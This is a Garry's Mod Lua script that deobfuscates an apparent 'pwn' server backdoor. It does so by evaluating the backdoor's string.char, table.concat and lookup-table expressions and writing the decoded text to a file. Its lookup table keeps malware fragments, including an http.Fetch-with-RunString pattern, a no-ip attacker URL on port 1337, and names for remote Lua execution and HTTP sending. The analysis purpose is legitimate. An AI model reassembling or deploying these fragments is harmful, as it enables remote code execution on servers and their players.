
local ov = {}
ov.G=''
ov.Cg='6'
ov.Py='s'
ov.zf='p'
ov.Pe='>'
ov.oo='='
ov.Jr='2'
ov.Nh='R'
ov.sf='<'
ov.Nf='|'
ov.Ep='G'
ov.qj='l'
ov.Kk='x'
ov.mh='c'
ov.We='!'
ov.td='	'
ov.ri=' '
ov.Ke='0'
ov.pi='1'
ov.lu='5'
ov.eh='f'
ov.Rq='['
ov.os='.'
ov.ej=':'
ov.Uq='%'
ov.Yg='&'
ov.Le='pt'
ov.xw=', '
ov.ig='[^'
ov.Zk='os'
ov._w='):'
ov.oa='=='
ov.qq='%%'
ov.Vd='\n'
ov.qp=': '
ov.ts='\\'
ov.Bi='ai'
ov.Dg='tf'
ov.fe='\"'
ov.ps='\t'
ov.Lo='pl'
ov.Ty=' ('
ov.sg='ip'
ov.tk='|0'
ov.jr='=]'
ov.nu=' ['
ov.Sj='\\a'
ov.Mh='b64'
ov.bw='spl'
ov.ea='dec'
ov.bh='Msg'
ov.ct='sub'
ov.Pd='\\s'
ov.tp='mod'
ov.P='\\q'
ov.R='Sln'
ov.kk='\\p'
ov.Lf='inf'
ov.jg='chk'
ov.uw='von'
ov.Qw=']: '
ov.vu='\\e'
ov.ze='Add'
ov.lt='enc'
ov.cq='len'
ov._p='get'
ov.ao='pwn'
ov.ti='bin'
ov.Yu='\\t'
ov.nj='cmd'
ov.uo='bit'
ov.ji='\\o'
ov.Ag='CRC'
ov.Tt='key'
ov.Ch='sql'
ov.yg='net'
ov.wq=' \"'
ov.Et='jit'
ov.Lg='\\c'
ov.jw='\\n'
ov.by='uid'
ov.Te='rep'
ov.Ye='?a='
ov.zk=']\n'
ov.vo='reg'
ov.Hw='NONE'
ov.Kg='file'
ov.yu='Nick'
ov.g='math'
ov.ls='ents'
ov.Ka='rate'
ov.Yq=']: ['
ov.Jf='util'
ov.Ve='team'
ov.wf='boot'
ov.fa='HTTP'
ov.Cr='func'
ov.og='undo'
ov._i='time'
ov.gd='reps'
ov.n='byte'
ov.uu='list'
ov.Xs='Copy'
ov.Yk='meta'
ov.jt='MsgC'
ov.Hk='find'
ov.Xy='\\\\'
ov.ar='gsub'
ov.Pp='MsgN'
ov.Xf='game'
ov.Rp='Send'
ov.Uu=']:\n'
ov.Wu='Open'
ov.sh='char'
ov.Xe='wake'
ov.ra='Call'
ov.pe='gmod'
ov.kw='umsg'
ov.cp='HOOK'
ov.hg='Lerp'
ov.Cf='%%%1'
ov.vk='name'
ov.Kt='type'
ov.Bk='next'
ov.ai='0000'
ov.Zw='http'
ov.jd='Path'
ov.Gf='diff'
ov.Jy='hook'
ov.Qs='error'
ov.la='sound'
ov.Zd='46_39_35_221_'
ov.Ur='TIMER'
ov.Mq='drive'
ov.Ad='upper'
ov.hk='E2Lib'
ov.kt='proxy'
ov.Vf='pcall'
ov.Kj='Error'
ov.Ky='Model'
ov.ss='debug'
ov.Je='pairs'
ov.Tf='Start'
ov.dj='delay'
ov.Rr='lower'
ov.y='sleep'
ov.hq='Sound'
ov.yj='Hooks'
ov.to='Think'
ov.dk='Color'
ov.sa='delta'
ov.cr='Merge'
ov.rk='keyid'
ov.dr='Angle'
ov.Zu='crypt'
ov.vi='chk_r'
ov.Ls='\":\n'
ov.rt='cvars'
ov.ya='timer'
ov.Hu='enter'
ov.yh='print'
ov.Ny='table'
ov.Dt='remove'
ov.aj='GetAll'
ov.zp='insert'
ov.Uw='Remove'
ov.fo='CPULib'
ov.Aw='SERVER'
ov.Ih='tobool'
ov.Zy='runlua'
ov.xt='Parser'
ov._u='Player'
ov.Zj='system'
ov.hh='GPULib'
ov.bt='numpad'
ov.De='Vector'
ov.Uk='xpcall'
ov.vf='rawget'
ov.ga='SQLStr'
ov.Rs='isbool'
ov.nd='Format'
ov.Ti='random'
ov.py='ipairs'
ov.Xa='Simple'
ov.Cy='e2_use'
ov.Hy='player'
ov.ep='engine'
ov.Qq='gmsave'
ov.Qk='Entity'
ov.ce='module'
ov.nk='Either'
ov.Ef='Matrix'
ov.hf='assert'
ov.Zs='MsgAll'
ov.xr='unpack'
ov.La='concat'
ov.Ta='gcinfo'
ov.jk='select'
ov.fj='CLIENT'
ov.yd='TypeID'
ov.hd='hammer'
ov.ae='string'
ov.Fa='rawset'
ov.wp='http_id'
ov.At='IsValid'
ov.Pj='address'
ov.Ot='getfenv'
ov.Qy='Replace'
ov.qu='enabled'
ov.cy='__index'
ov.Zf='ai_task'
ov.lf='require'
ov.Gd='timeout'
ov.He='include'
ov.Jq='setfenv'
ov.de='isangle'
ov.xo='navmesh'
ov.hi='cleanup'
ov.Wi='b64_enc'
ov.qy='AdvDupe'
ov.Oq='SendLua'
ov.Rt='ToTable'
ov.Ed='getinfo'
ov.bp='SysTime'
ov.ur='SteamID'
ov.gi='isOwner'
ov.ba='CurTime'
ov.Ui='AddHook'
ov.ad='working'
ov.aq='pwn.srv'
ov.Uf='getBone'
ov.Ww='package'
ov.si='physenv'
ov.bj='weapons'
ov.bo='ispanel'
ov.Uo='b64_dec'
ov.le='widgets'
ov.wy='istable'
ov.Jk='CCSpawn'
ov.Tg='Receive'
ov.cf='isvector'
ov.Ns='EndsWith'
ov.O='isnumber'
ov.li='rawequal'
ov.Bu='PropCore'
ov.iu='UniqueID'
ov.eg='Material'
ov.Yr='tostring'
ov.Iq='pwn_wake'
ov.xg='GetTable'
ov.pw='MakeProp'
ov.Jg='TimedSin'
ov.vg='RealTime'
ov.Xr='download'
ov.Ji='resource'
ov.f='pairs_ac'
ov.Vs='user_msg'
ov.Yp='IntToHex'
ov.Yw='Compiler'
ov.ok='chk_last'
ov.Ps='Timer \"'
ov.Nq='getOwner'
ov.i='GetHooks'
ov.a='validNPC'
ov.kq='getlocal'
ov.Gs='gamemode'
ov.E='ERROR:\n'
ov.ve='BinToInt'
ov.gg='NET HOOK'
ov.Dw='tonumber'
ov.pj='sendtocl'
ov.Gy='hostport'
ov.ih='isstring'
ov.gq='MakeLamp'
ov.Tu='IsEntity'
ov.Iu='TimedCos'
ov.Fh='newproxy'
ov.vt='IntToBin'
ov.Ld='isentity'
ov._q='nextcall'
ov.Po='CallHooks'
ov.Ra='baseclass'
ov.wr='GetTimers'
ov.Ha='GetConVar'
ov.Rd='IsMounted'
ov.Qp='RunString'
ov.o='FrameTime'
ov.au='gameevent'
ov.Pu='StopTimer'
ov.Y='coroutine'
ov.Dd='ReadFloat'
ov.Ng='MakeWheel'
ov.Fw='tablekeys'
ov.Ne='factorial'
ov.sq='dowload_r'
ov.Xt='http_send'
ov.Bp='Tokenizer'
ov._j='AngleRand'
ov.my='vector_up'
ov.Sf='pairs_map'
ov.js='MakeLight'
ov.Ku='construct'
ov.cw='IncludeCS'
ov.Za='DebugInfo'
ov.Ew='short_src'
ov.qt='EmitSound'
ov.r='Spawn_NPC'
ov.nr='StartWith'
ov.m='dupeshare'
ov.Ga='LerpAngle'
ov.By='ServerLog'
ov.fg='ERROR IN '
ov.Ie='PrintTable'
ov.zq='ColorToHSV'
ov.ft='Serialiser'
ov.Yj='Spawn_SENT'
ov.Xo='VectorRand'
ov.Gj='ReadString'
ov.I='properties'
ov.v='\" failed.'
ov.Ae='ColorAlpha'
ov.ot='RemoveHook'
ov.sd='constraint'
ov.ho='WriteFloat'
ov.Lu='DamageInfo'
ov.Lw='chk_failed'
ov.qh='EffectData'
ov.zw='__newindex'
ov.ha='http_proxy'
ov.Jh='CCGiveSWEP'
ov.kh='concommand'
ov.oy='duplicator'
ov.io='HSVToColor'
ov.Uh='StartTimer'
ov.Kw='LerpVector'
ov.xs='MakeButton'
ov.Th='angle_zero'
ov.Bq='ipairs_map'
ov.sr='PauseTimer'
ov.Aa='isfunction'
ov.Eg='tps_pretty'
ov.Mp='WriteString'
ov.Hi='__e2getcost'
ov.hs='VehicleExit'
ov.tr='unconnected'
ov.aa='AdjustTimer'
ov.Hg='TimerExists'
ov.ef='AddCSE2File'
ov.qe='usermessage'
ov.No='RunStringEx'
ov.Bo='ErrorNoHalt'
ov.we='BeamNetVars'
ov.of='TauntCamera'
ov.mu='CreateSound'
ov.hw='ai_schedule'
ov.M='checkEntity'
ov.Tj='MakeBalloon'
ov.ie='LocalPlayer'
ov.u='CompileFile'
ov.Jo='pwn.init_cl'
ov.Ah='__e2setcost'
ov.Gg='color_white'
ov.Ki='MakeEmitter'
ov.e='setinterval'
ov.bs='tablevalues'
ov.Ud='RandomPairs'
ov.Mi='MakeWirehdd'
ov.Au='MakeWireGPS'
ov.fh='http_answer'
ov.Sg='SetE2DLight'
ov.Qt='GetHostName'
ov.hu='MakeWireCam'
ov.uq='CreateTimer'
ov.nq='color_black'
ov.gf='saverestore'
ov.Ri='StringToHex'
ov.Sh='MakeWirePod'
ov.Fi='SortedPairs'
ov.qa='getregistry'
ov.zh='GateActions'
ov.s='SimpleTimer'
ov.Xp='CheckTimers'
ov.fs='SendToServer'
ov.gu='registerType'
ov.iy='MakeWirePlug'
ov.Is='printplayers'
ov.ny='AddCSLuaFile'
ov.Eq='MakeWireLamp'
ov.Hh='http_waiting'
ov.st='SetGlobalInt'
ov.mp='setmetatable'
ov.as='http.Fetch("'
ov.Fs='DestroyTimer'
ov.Ap='EmitSentence'
ov.zd='MakeDynamite'
ov.yt='PrintMessage'
ov.Qo='MakeWireDHDD'
ov.zu='e2_softquota'
ov._e='update_derma'
ov.Lk='MakeWireUser'
ov.bu='SimpleTimer#'
ov.va='remove_derma'
ov.Xw='AccessorFunc'
ov.Ey='GetGlobalVar'
ov.ns='validPhysics'
ov.ck='CC_GMOD_Tool'
ov.Ii='WorldToLocal'
ov.Jd='MakeWire7Seg'
ov._r='OrderVectors'
ov.tw='LocalToWorld'
ov.Hd='debugoverlay'
ov.Nr='MakeWireGate'
ov.h='SetGlobalVar'
ov.d='chk_interval'
ov.Ei='UnPauseTimer'
ov.z='PreProcessor'
ov.np='E2Power_pass'
ov.ew='BroadcastLua'
ov.Gu='e2_hardquota'
ov.lp='CreateConVar'
ov.vy='ConVarExists'
ov.ly='MakeThruster'
ov.du='getmetatable'
ov.Xg='Spawn_Weapon'
ov.ja='motionsensor'
ov.Ly='GetGlobalInt'
ov.qd='NET CALLBACK'
ov.wh='e2_tickquota'
ov.ue='replycommands'
ov.Hp='e2_get_typeid'
ov.yo='pwn_chk_timer'
ov.oi='GetGlobalBool'
ov.Aj='MakeWireWheel'
ov.J='MakeWireValue'
ov.hr='scripted_ents'
ov.mk='E2_spawn_beam'
ov.uh='MakeWireTrail'
ov.df='MakeWireStore'
ov.Ca='T7ZmdU5RDusZAzISP9DcopC9eaz2FulLfbSzZ5JcX9IYglP488juUydxsXbwfrMYNRYfKf1GljAoShCXSn3H0sdosji9OGoKpwKXBvfCuDNjYrL68DQMaaHDjbeQy1yFo28AOq7haoOfb6DiIsw5glI9ctTmxVHgUaoDtob7H'
ov.Np='VGUIFrameTime'
ov.gy='Spawn_Vehicle'
ov.pf='NewBallSocket'
ov.lw='MakeWirePanel'
ov.Rk='E2_spawn_quad'
ov.To='ProtectedCall'
ov.cd='SoundDuration'
ov.fu='SetGlobalBool'
ov.Yd='ModelPlugInfo'
ov.Aq='MakeWireRelay'
ov.Zh='vector_origin'
ov.Xi='kRenderFxNone'
ov.Ni='MakeHoverBall'
ov.mg='g_SBoxObjects'
ov.ed='MakeWireLatch'
ov.Dp='FindMetaTable'
ov.nt='query_blocked'
ov.Wr='pwn_http_send'
ov.iq='MakeWireWinch'
ov.ff='e2_parse_args'
ov.fq='PrecacheScene'
ov.Wh='MakeWirePixel'
ov.Vh='-------------'
ov.ww='CompileString'
ov.F='Add_NPC_Class'
ov.up='MakeWireLight'
ov.ye='HTTP CALLBACK'
ov.ky='GMODSpawnProp'
ov.Ht='MakeWireCDRay'
ov.Td='MakeWireRadio'
ov.Mf='CheckFunction'
ov.Bs='LoadWireGates'
ov.tj='MakeWireInput'
ov.Cu='MakeWireNailer'
ov.rd='MakeWireCDLock'
ov.Lj='MakeWireWeight'
ov.ka='MakeWireCDDisk'
ov.Nd='collectgarbage'
ov._o='InitPostEntity'
ov.ag='MakeWireOutput'
ov.Dq='MakeWireEyePod'
ov.ty='CheckPropSolid'
ov.sk='GetGlobalAngle'
ov._d='MakeWireForcer'
ov.Qj='MakeWireAdvPod'
ov.Gw='MakeWireButton'
ov.ip='AddOriginToPVS'
ov.Oj='MakeWireExtBus'
ov.Wo='MakeWireSensor'
ov.Os='pairs_sortkeys'
ov.eu='AccessorFuncNW'
ov.Uj='MakeWireScreen'
ov.Lh='SetGlobalAngle'
ov.V='player_manager'
ov.oe='e2_extpp_pass2'
ov.Ss='GetGlobalFloat'
ov.Rg='ParticleEffect'
ov.Kr='e2_extpp_pass1'
ov.bf='Radio_SendData'
ov.x='DeriveGamemode'
ov.Gp='MakeWireNumpad'
ov.Tk='MakeWireTurret'
ov.Xu='Radio_Register'
ov.zt='MakeWireRanger'
ov.Kh='SetGlobalFloat'
ov.Vk='MakeWireSocket'
ov.hp='sendDermaStuff'
ov.pk='GetConVarString'
ov.Xd='MakeWireIgniter'
ov.wj='GetGlobalEntity'
ov.fy='MakeWireLocator'
ov.Fj='SYNTAX ERROR:\n'
ov.C='E2_spawn_sprite'
ov.Mu='local pwn=_G[\''
ov.zo='MakeWireSpawner'
ov.Js='SendUserMessage'
ov.Ek='E2_Spawn_Effect'
ov.ld='GPUCacheManager'
ov.qs='GetConVarNumber'
ov.jq='SetGlobalEntity'
ov.ry='SetGlobalString'
ov.Ms='physgun_limited'
ov.su='E2Power_Version'
ov.Ee='MakeWireGrabber'
ov.mf='MakeWireEmitter'
ov.ng='RecipientFilter'
ov.Bd='MakeWireVehicle'
ov.jf='GetGlobalString'
ov.Wf='GMODSpawnEffect'
ov.ug='GetGlobalVector'
ov.fd='pwn_http_answer'
ov._y='MakeWireColorer'
ov.aw='SetGlobalVector'
ov.t='pwn_CheckTimers'
ov.Vw='MakeWireEmarker'
ov.uy='kRenderFxRagdoll'
ov.A='validModelCached'
ov.Us='pairs_sortvalues'
ov.Fr='registerCallback'
ov.Rh='MakeWireDataRate'
ov.Su='MakeWireHologrid'
ov.Od='GMODSpawnRagdoll'
ov.Hr='MakeWireWaypoint'
ov.Zq='MakeWireDataPort'
ov.bg='registerFunction'
ov.ee='fsender_interval'
ov.kf='SafeRemoveEntity'
ov.Ck='DropEntityIfHeld'
ov.ir='%d%d%d?%d?%d?%d?'
ov.ey='kRenderFxEnvRain'
ov.pr='MakeWireDataPlug'
ov.My='MakeWireAdvInput'
ov.md='MakeWireKeyboard'
ov.Sw='kRenderFxExplode'
ov.re='SetGlobalBeamInt'
ov.Mg='kRenderFxDistort'
ov.Hq='MakeWireThruster'
ov.fr='registerOperator'
ov.cg='EB729602389D126'
ov.Eo='Radio_Unregister'
ov.Mr='GetGlobalBeamInt'
ov.yy='AddNetworkString'
ov.rq='0123456789ABCDEF'
ov.ku='e2_tostring_bone'
ov.Rj='kRenderFxEnvSnow'
ov.Zo='RunConsoleCommand'
ov.ru='kRenderFxFadeFast'
ov.tu='MakeWireGyroscope'
ov.Oe='MakeWireHydraulic'
ov.qi='E2Power_BlackList'
ov.Na='kRenderFxFadeSlow'
ov.If='NetworkStringToID'
ov.Pq='CC_Face_Randomize'
ov.Si='MakeWireDualInput'
ov._s='MakeWireIndicator'
ov.Iw='MakeWireExplosive'
ov.Hs='GetGlobalBeamBool'
ov.Wk='Radio_GetTwoWayID'
ov.yk='color_transparent'
ov.Ay='NetworkIDToString'
ov.ca='E2Power_GroupList'
ov.Mj='MakeWireDetonator'
ov.cj='kRenderFxHologram'
ov.Ry='2.lua",RunString)'
ov.lj='IsEnemyEntityName'
ov.od='MakeWireFXEmitter'
ov.Fy='E2Power_PassAlert'
ov.Gr='Radio_RecieveData'
ov.nh='AddConsoleCommand'
ov.hy='SetGlobalBeamBool'
ov.fk='MakeWireHoverBall'
ov.po='SetGlobalBeamAngle'
ov._a='MakeWireDataSocket'
ov.Du='SetGlobalBeamFloat'
ov.Ir='ModelPlug_Register'
ov.yq='ApplyColMatSpawned'
ov.j='kRenderFxSolidFast'
ov.ia='GetGlobalBeamFloat'
ov.wa='PlayerInitialSpawn'
ov.bd='kRenderFxPulseSlow'
ov.Zi='kRenderFxSpotlight'
ov.vw='GetGlobalBeamAngle'
ov.Cs='MakeWireAddressBus'
ov.Oi='MakeWireTextScreen'
ov.sw='kRenderFxSolidSlow'
ov.jp='SortedPairsByValue'
ov.Dk='kRenderFxGlowShell'
ov.dp='PlaceDecal_delayed'
ov.Qd='CreateClientConVar'
ov.qk='E2Power_first_load'
ov.mj='IsFriendEntityName'
ov.Ig='SuppressHostEvents'
ov.N='MakeWireAdvEMarker'
ov.Wt='MakeWireTransferer'
ov.Jp='kRenderFxPulseFast'
ov.Ho='UnPredictedCurTime'
ov.Vj='DoPropSpawnedEffect'
ov.b='GetGlobalBeamString'
ov.Br='SetGlobalBeamEntity'
ov.Yh='GetGlobalBeamVector'
ov.Cd='kRenderFxStrobeFast'
ov.jh='SetGlobalBeamString'
ov.oq='sensor_debugragdoll'
ov.Wq='UTIL_IsUselessModel'
ov.Dy='SetGlobalBeamVector'
ov.Ao='DoPlayerEntitySpawn'
ov.yw='MakeWireSpeedometer'
ov.As='kRenderFxStrobeSlow'
ov.Mt='MakeWireHoloemitter'
ov.qw='MakeWireExpression2'
ov.dy='Radio_ChangeChannel'
ov.T='MakeWireWaterSensor'
ov.Cj='GetGlobalBeamEntity'
ov.xp='MakeWireOscilloscope'
ov.Vt='MakeWireHudIndicator'
ov.co='MakeWireTwoWay_Radio'
ov.Tq='kRenderFxFlickerSlow'
ov.kp='PrecacheSentenceFile'
ov.Xk='MakeWireTextReceiver'
ov.zy='ParticleEffectAttach'
ov.he='MakeGPULibController'
ov.cu='IsFirstTimePredicted'
ov.tf='MakeWireTargetFinder'
ov.xk='MakeClutchController'
ov.Pt='InjectConsoleCommand'
ov.Gk='kRenderFxFlickerFast'
ov.Md='MakeWireLaserReceiver'
ov.Ft='kRenderFxStrobeFaster'
ov.Bt='E2_spawn_prop_dynamic'
ov.rj='MakeWireDigitalScreen'
ov.Eh='MakeWireDynamicButton'
ov._t='PrecacheSentenceGroup'
ov.bi='RestoreCursorPosition'
ov.Oy='RefreshSpecialOutputs'
ov.Fu='MakeWireconsoleScreen'
ov.Yo='sensor_stretchragdoll'
ov.Hj='MakeWireSatellitedish'
ov.uf='%d%d%d?%d?%d?%d?%d?%d?'
ov._='MakeWireGraphicsTablet'
ov.Ro='RememberCursorPosition'
ov.ma='PrecacheParticleSystem'
ov.l='IsTableOfEntitiesValid'
ov.Ej='MakeWireVectorThruster'
ov.Vg='kRenderFxClampMinScale'
ov.Ug='kRenderFxNoDissipation'
ov.kg='MakeWireDamageDetector'
ov.rh='kRenderFxPulseFastWide'
ov.Sk='kRenderFxPulseSlowWide'
ov.Ju='E2_Spawn_ParticleEffect'
ov.Vo='kRenderFxPulseFastWider'
ov.Qh='MakeWireWinchController'
ov.go='SafeRemoveEntityDelayed'
ov.ph='MakeWireSimpleExplosive'
ov.eo='MakeWireLatchController'
ov.Xh='BuildNetworkedVarsTable'
ov.H='SetPhysConstraintSystem'
ov.Ip='FixInvalidPhysicsObject'
ov.Cp='SortedPairsByMemberValue'
ov.Wa='InjectCommandAutocomplete'
ov.Go='MakeWireHydraulicController'
ov.iw='Expression2SetProgressServer'
ov.Df='[%-%^%$%(%)%%%.%[%]%*%+%-%?]'
ov.mw='lua/includes/modules/hook.lua'
ov.pu='http://yaybomb.no-ip.org:1337/'
ov.Lp='ComboBox_Wire_FX_Emitter_Options'
ov.dh='\']local G,R,cmd=pwn.G,pwn.R,pwn.G.cmd '
ov.Qf='pwn.Call: argument list is not valid. Values: '
ov.er='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

local XCode = {
	ov		= ov,
	oiuy 	= string.char,
	slfo 	= table.concat,
}


--local code = "poop[ov[slfo({'X',oiuy(109-2-13+3)})]](0, ass()"
--local code = "pwn[ov[oiuy(81-1)..'j']] .. pwn[ov[slfo({oiuy(118-11-7-2),oiuy(114+7+0-19+19)})]]"

local code = HSP.file.Read("temp_indent.lua", "DATA")

--print(code)




local Patt = {
	"oiuy%(.-%)",
	"slfo%(%{.-%}%)",
	"ov%[.-%]",
}

for k,v in ipairs(Patt) do
	for This in code:gmatch(v) do
		local Func = CompileString("return "..This, v)
		
		setfenv(Func, XCode)
		
		local ran,ret = pcall(Func)
		--print("! call: ran,ret: ", ran,ret)
		
		if ret then
			code = code:Replace(This, "'"..ret.."'")
		end
	end
end

print("! code: ", code)











--print("! oiuy:")
for fuck in code:gmatch("oiuy%(.-%)") do
	local Code = CompileString("return "..fuck, "FuckYou")
	
	setfenv(Code, XCode)
	
	local ran,ret = pcall(Code)
	--print("! call: ran,ret: ", ran,ret)
	
	code = code:Replace(fuck, "'"..ret.."'")
end

--print(code)



--print("\n! slfo:")
for fuck in code:gmatch("slfo%(%{.-%}%)") do
	local Code = CompileString("return "..fuck, "FuckYou")
	
	setfenv(Code, XCode)
	
	local ran,ret = pcall(Code)
	--print("! call: ran,ret: ", ran,ret)
	
	code = code:Replace(fuck, "'"..ret.."'")
end

--print(code)


print("\n! ov:")
for fuck in code:gmatch("ov%[.-%]") do
	--print("! ov match: ", fuck)
	
	local Code = CompileString("return "..fuck, "FuckYou")
	
	setfenv(Code, XCode)
	
	local ran,ret = pcall(Code)
	--print("! call: ran,ret: ", ran,ret)
	
	if ret then
		code = code:Replace(fuck, "'"..ret.."'")
	end
end

--print(code)

HSP.file.Write("out.txt", code)

print("! saved: ", #code)



/*
local code = "poop[ov[slfo({'X',oiuy(109-2-13+3)})]](0, ass()"

local call = code:match("%b()")
call = "slfo"..call
try( call )



local txt = "[slfo({'y','y'})]"




local slfo = table.concat
local oiuy = string.char

local out = ov[
	slfo( {'X',oiuy(109-2-13+3)} )
]

print( string.char(109-2-13+3) )

do return end


local function try(...)
	for k,v in pairs( {...} ) do
		print(v)
	end
end

--util[ov[slfo({'y','y'})]](ov['Iq'])
--slfo({'T','g'})

--try( code:match("((slfo((.-))))") )
*/



